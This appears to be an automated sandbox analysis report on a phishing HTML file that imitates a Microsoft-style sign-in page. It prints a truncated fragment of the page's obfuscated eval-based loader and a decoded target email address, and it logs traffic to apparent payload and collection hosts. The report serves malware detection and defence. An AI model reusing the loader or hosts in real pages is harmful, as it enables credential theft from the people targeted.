Click to jump to signature section
Source: Yara match | File source: 2.2.pages.csv, type: HTML |
Source: Yara match | File source: 1.1.pages.csv, type: HTML |
Source: 0.0.id.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/ATTT003.html... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and heavy obfuscation. The use of `eval` and the `Function` constructor to execute remote code, along with the transmission of potentially sensitive data to an unknown domain, are clear indicators of malicious intent. The extensive obfuscation of the code and URLs further reinforces the suspicion of malicious activity. Overall, this script poses a significant security risk and should be treated with caution. |
Source: ATTT003.html | HTTP Parser: Low number of body elements: 0 |
Source: file:///C:/Users/user/Desktop/ATTT003.html | Tab title: Sign in to your account |
Source: file:///C:/Users/user/Desktop/ATTT003.html# | Tab title: Sign in to your account |
Source: ATTT003.html | HTTP Parser: <script>let rh13z8jemt = 'eWFuc2FyaUBjd2luZ2F0ZS5jb20='; // Jowl labore sirloin voluptate.let lXX2;!function(){const Uf2H=Array.prototype.slice.call(arguments);return eval("(function MZgG(vfoy){const PCgy=zkty(vfoy,Hs6x(MZgG.toString()));try{let ... |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: Number of links: 0 |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: <input type="password" .../> found but no <form action="... |
Source: ATTT003.html | HTTP Parser: Base64 decoded: yansari@cwingate.com |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: Title: Sign in to your account does not match URL |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: Invalid link: Privacy statement |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: Has password / email / username input fields |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: <input type="password" .../> found |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: No favicon |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: No favicon |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: No <meta name="author".. found |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: No <meta name="copyright".. found |
Source: global traffic | HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1738331999058&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1Accept-Encoding: gzip, deflateContent-Length: 2746Content-Type: application/json; charset=UTF-8Host: browser.events.data.msn.cnConnection: Keep-AliveCache-Control: no-cache |
Source: Joe Sandbox View | IP Address: 104.18.10.207 104.18.10.207 |
Source: Joe Sandbox View | IP Address: 104.18.10.207 104.18.10.207 |
Source: Joe Sandbox View | IP Address: 2.23.209.34 2.23.209.34 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.15 |
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.184.195 |
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.184.195 |
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.184.195 |
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.184.195 |
Source: unknown | TCP traffic detected without corresponding DNS query: 2.21.65.132 |
Source: unknown | TCP traffic detected without corresponding DNS query: 2.21.65.132 |
Source: unknown | TCP traffic detected without corresponding DNS query: 2.21.65.132 |
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.209.40 |
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.209.40 |
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.209.40 |
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.209.40 |
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.184.195 |
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.184.195 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic | HTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: nullsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: nullsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /attach%2Fbootstrap.min.js HTTP/1.1Host: 1419993777-1317754460.cos.ap-singapore.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /attach%2Fbootstrap.min.js HTTP/1.1Host: 1419993777-1317754460.cos.ap-singapore.myqcloud.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog |
Source: global traffic | DNS traffic detected: DNS query: code.jquery.com |
Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com |
Source: global traffic | DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com |
Source: global traffic | DNS traffic detected: DNS query: stackpath.bootstrapcdn.com |
Source: global traffic | DNS traffic detected: DNS query: 1419993777-1317754460.cos.ap-singapore.myqcloud.com |
Source: global traffic | DNS traffic detected: DNS query: www.google.com |
Source: global traffic | DNS traffic detected: DNS query: ableg.filevaultaccounting.com |
Source: global traffic | DNS traffic detected: DNS query: aadcdn.msftauth.net |
Source: unknown | HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1738331999058&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1Accept-Encoding: gzip, deflateContent-Length: 2746Content-Type: application/json; charset=UTF-8Host: browser.events.data.msn.cnConnection: Keep-AliveCache-Control: no-cache |
Source: chromecache_73.1.dr, chromecache_71.1.dr | String found in binary or memory: http://opensource.org/licenses/MIT). |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53968 |
Source: unknown | Network traffic detected: HTTP traffic on port 53973 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53966 |
Source: unknown | Network traffic detected: HTTP traffic on port 53992 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53996 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53961 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54013 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53964 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54018 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54017 |
Source: unknown | Network traffic detected: HTTP traffic on port 53982 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53957 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53986 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 54013 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53978 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53977 |
Source: unknown | Network traffic detected: HTTP traffic on port 53993 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53966 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53970 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53974 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53973 |
Source: unknown | Network traffic detected: HTTP traffic on port 53977 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53990 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53989 |
Source: unknown | Network traffic detected: HTTP traffic on port 54001 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53982 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53981 |
Source: unknown | Network traffic detected: HTTP traffic on port 54018 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53961 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53986 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53985 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53984 |
Source: unknown | Network traffic detected: HTTP traffic on port 53984 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53959 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53990 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54001 |
Source: unknown | Network traffic detected: HTTP traffic on port 53978 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53991 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53995 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53958 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53957 |
Source: unknown | Network traffic detected: HTTP traffic on port 53970 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53974 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53968 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53989 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53959 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53993 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53992 |
Source: unknown | Network traffic detected: HTTP traffic on port 53964 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53991 |
Source: unknown | Network traffic detected: HTTP traffic on port 54017 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53996 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53995 |
Source: unknown | Network traffic detected: HTTP traffic on port 53958 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53981 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 53985 -> 443 |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir1092_1364403511 | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir1092_1364403511 | Jump to behavior |
Source: classification engine | Classification label: mal68.phis.winHTML@16/28@30/12 |
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATTT003.html" | |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2148,i,15482744133375623234,5143722552884581729,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=2172 /prefetch:11 | |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --string-annotations=is-enterprise-managed=no --field-trial-handle=4540,i,15482744133375623234,5143722552884581729,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=5108 /prefetch:14 | |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2148,i,15482744133375623234,5143722552884581729,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=2172 /prefetch:11 | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --string-annotations=is-enterprise-managed=no --field-trial-handle=4540,i,15482744133375623234,5143722552884581729,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=5108 /prefetch:14 | Jump to behavior |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: file:///C:/Users/user/Desktop/ATTT003.html |